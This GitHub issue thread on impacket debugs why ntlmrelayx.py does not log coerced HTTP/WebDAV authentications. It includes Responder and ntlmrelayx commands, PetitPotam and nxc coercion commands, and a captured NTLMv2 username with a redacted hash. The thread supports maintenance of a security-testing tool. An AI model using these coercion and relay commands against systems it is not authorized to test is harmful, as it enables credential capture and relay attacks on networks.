### ISSUE TITLE
[ntlmrelayx.py] fails to pick up requests over HTTP

### ISSUE THREAD

**Issue by Sockmower** [fortra/impacket#1651]
I'm trying to capture and relay authentication using ntlmrelayx.py; a Responder session in the same terminal window picks up the HTTP requests fine, but ntlmrelayx fails to produce any output even when debug mode is on. The client at 172.0.0.1 is repeatedly making HTTP requests to a resource on the attacker machine. The responder output is included below for reference:

```
mower@mowerbox:~$ sudo Responder.py -I ens3 -v

[omitted for brevity]
 
[+] Generic Options:
    Responder NIC              [ens3]
    Responder IP               [10.1.1.1]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP', 'ISATAP.LOCAL']
 
[+] Current Session Variables:
    Responder Machine Name     [WIN-1H2DNOLTFNE]
    Responder Domain Name      [XOAS.LOCAL]
    Responder DCE-RPC Port     [49079]
 
[+] Listening for events...
 
[!] Error starting SSL server on port 5986, check permissions or other servers running.
[!] Error starting SSL server on port 443, check permissions or other servers running.
[HTTP] Sending NTLM authentication request to 172.0.0.1 
[HTTP] GET request from: ::ffff:172.0.0.1 URL: /test.jpeg 
[HTTP] NTLMv2 Client   : 172.0.0.1 
[HTTP] NTLMv2 Username : APERTURE\cjohnson
[HTTP] NTLMv2 Hash     : cjohnson::APERTURE:ommitted_for_brevity
```

Running ntlmrelayx in the same terminal, while the HTTP requests are still being made:

```
mower@mowerbox:~$ sudo ntlmrelayx.py -tf targets.txt -smb2support -debug -ip 10.1.1.1
Impacket v0.11.0 - Copyright 2023 Fortra
 
[+] Impacket Library Installation Path: /usr/local/lib/python3.8/dist-packages/impacket
[*] Protocol Client SMB loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[+] Protocol Attack LDAP loaded..
[+] Protocol Attack LDAPS loaded..
[+] Protocol Attack HTTP loaded..
[+] Protocol Attack HTTPS loaded..
[+] Protocol Attack IMAP loaded..
[+] Protocol Attack IMAPS loaded..
[+] Protocol Attack SMB loaded..
[+] Protocol Attack DCSYNC loaded..
[+] Protocol Attack RPC loaded..
[+] Protocol Attack MSSQL loaded..
[*] Running in relay mode to hosts in targetfile
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666
 
[*] Servers started, waiting for connections

[no further output here]
```

Why is it that Responder picks up these requests just fine but ntlmrelayx fails to do so?

**Comment by Zamanry** [comment]
My team is having a similar issue. Auth PetitPotam SMB v1-3 > PC$ is not getting caught. Responder does. Pcredz does not. Someone else recommended you need to declare your network interface with ntlmrelayx.

**Comment by Sockmower** [comment]
@Zamanry: Thanks; do you know the argument to do so so I can test that?

**Comment by Zamanry** [comment]
> @Zamanry: Thanks; do you know the argument to do so so I can test that?

-ip #.#.#.# where #.#.#.# is your interface IP

**Comment by Sockmower** [comment]
Ah! I am already specifying `-ip`. Thanks though

**Comment by p0dalirius** [comment]
Same issue here, any advice?

**Comment by Zamanry** [comment]
I tried the -ip flag, never fixed it. I’ve encountered this issue at multiple clients now.

**Comment by gabrielg5** [comment]
Hi, been doing some tests and wasn't able to replay the same behavior you are having.

There a couple parameters in ntlmrelayx to indicate in which **interface** (`-ip`) and **port** (`--http-port` in this scenario) to listen for connections

Just thinking out loud, and trying to better understand the scenario to analyze where could the issue be:
Those HTTP requests are being done to the interface you configured there right?
can you try configuring HTTP server in another port?

**Comment by p0dalirius** [comment]
Hi,

We've been doing some tests with multiple impacket versions. 
It seems the issue was introduced between versions 0.9.24 and 0.10.0

Here are our results:

## Impacket 0.9.24 (receiving authentications)

We coerce an authentication through `EfsRpcEncryptFileSrv` with PetitPotam.py to a WebDaV server hosted on our machine on port `8080`:
![image](https://github.com/fortra/impacket/assets/79218792/6fa8db6a-dfe5-434a-b078-c954108460cd)

We do receive HTTP authentications in ntlmrelay:
![image](https://github.com/fortra/impacket/assets/79218792/ec1ea114-365f-494c-bdd0-e05794270a72)

And we do receive the expected `PROPFIND` handshake of WebDaV:
![G01tV2JrEb](https://github.com/fortra/impacket/assets/79218792/b09f0ae9-2b10-4849-8905-210ad966a6a1)

## Impacket 0.10.0 (not receiving authentications)

We coerce an authentication through `EfsRpcEncryptFileSrv` with PetitPotam.py to a WebDaV server hosted on our machine on port `8080`:
![image](https://github.com/fortra/impacket/assets/79218792/3883e702-a8de-4d64-9397-bb7dd5c739fc)

In this case (ntlmrelay in impacket 0.10.0), we do not receive any HTTP authentication on ntlmrelay:
![aXoh1b1Xaf](https://github.com/fortra/impacket/assets/79218792/a2aed5ec-a94b-42ec-b987-75838a279080)

But we do receive the expected `PROPFIND` handshake of WebDaV:
![CVcSdyNUWK](https://github.com/fortra/impacket/assets/79218792/23d5637a-c80e-47c6-b65f-f4d16fdeb5a1)

Therefore, we need to find in which commit the issue was introduced between:

- [impacket release 0.9.24](https://github.com/fortra/impacket/releases/tag/impacket_0_9_24) commit [`265ce178fc1afcf942e2e1fabd7c8fab64e94893`](https://github.com/fortra/impacket/commit/265ce178fc1afcf942e2e1fabd7c8fab64e94893) (working)
and
- [impacket release 0.10.0](https://github.com/fortra/impacket/releases/tag/impacket_0_10_0) commit [`7a18ef5c8b06aac5e36334927789429777382928`](https://github.com/fortra/impacket/commit/7a18ef5c8b06aac5e36334927789429777382928) (broken)

Best regards,
Podalirius

**Comment by anadrianmanrique** [comment]
@p0dalirius this issue is related to ldap parameters handling in ldapattack.py. The _webdav_ connection it's being handled ( as it's being shown in _wireshark_ ). Can you please try with the master branch version? it seems this was fixed in https://github.com/fortra/impacket/commit/337d50d04e191c2b323ccf4877500fc487126dd1

**Comment by anadrianmanrique** [comment]
@Sockmower sorry for the late response, can you provide the content of the target list file?
can you also try with the master branch version, as many things has changed in ntlmrelayx since you reported this issue?
Thanks!

**Comment by gabrielg5** [comment]
Hey,

yesterday was doing some tests with different Impacket versions and finally found the commit that removed the log message (https://github.com/fortra/impacket/commit/c237962425efa0f7de270d607c5053b530c71fb0) related with the **multirelay** feature addition at #1297

It only affects WebDav requests.
That is what was happening in your tests @p0dalirius.
Were you doing webdav requests or HTTP GETs in yours, @Sockmower??

When processing an HTTP GET a message is always logged (unless in _REDIRECT_ mode, but it wasn't the case in your tests)
https://github.com/fortra/impacket/blob/829239e334fee62ace0988a0cb5284233d8ec3c4/impacket/examples/ntlmrelayx/servers/httprelayserver.py#L245-L250

But when processing WebDav, the PROPFIND method is not logging anything - at least until the connection is properly relayed -
https://github.com/fortra/impacket/blob/829239e334fee62ace0988a0cb5284233d8ec3c4/impacket/examples/ntlmrelayx/servers/httprelayserver.py#L182-L189

A similar scenario, but for SMB relay, was solved in #1602. Will be submitting a new PR to handle these scenarios in all different relay servers; to give visibility on the received connections.

thank you!

**Comment by Zamanry** [comment]
I can jump in again! I was facing this issue with WebDAV coerced using PetitPotam code. Appreciate the help!

**Comment by WaiZ0** [comment]
Hi everyone, 
I do have a similar behavior as I succed to trigger an NTLM over SMB auth using the following command
`nxc smb $target -u $USER -p $PASSWORD -d $DOMAIN -M coerce_plus -o LISTENER='<myIP>@80/test' METHOD=PetitPotam`

But i only receive this output from `ntlmrelayx` output: `[*] HTTPD(80): Client requested path: /test/pipe/srvsvc`.

<img width="571" height="562" alt="Image" src="https://github.com/user-attachments/assets/4382b7f3-f6d2-4c90-ba27-243d9964d31d" />

But I do not get a PROPFIND request and do see a NTLM error `NT Status: STATUS_MORE_PROCESSING_REQUIRED (0xc0000016)` as shown below

<img width="1197" height="249" alt="Image" src="https://github.com/user-attachments/assets/f220e6ed-f516-4d21-abb6-8b1478532183" />

I got the same result with several working method from `Coercer`.

Do you have any idea what could cause this kind of behavior ?
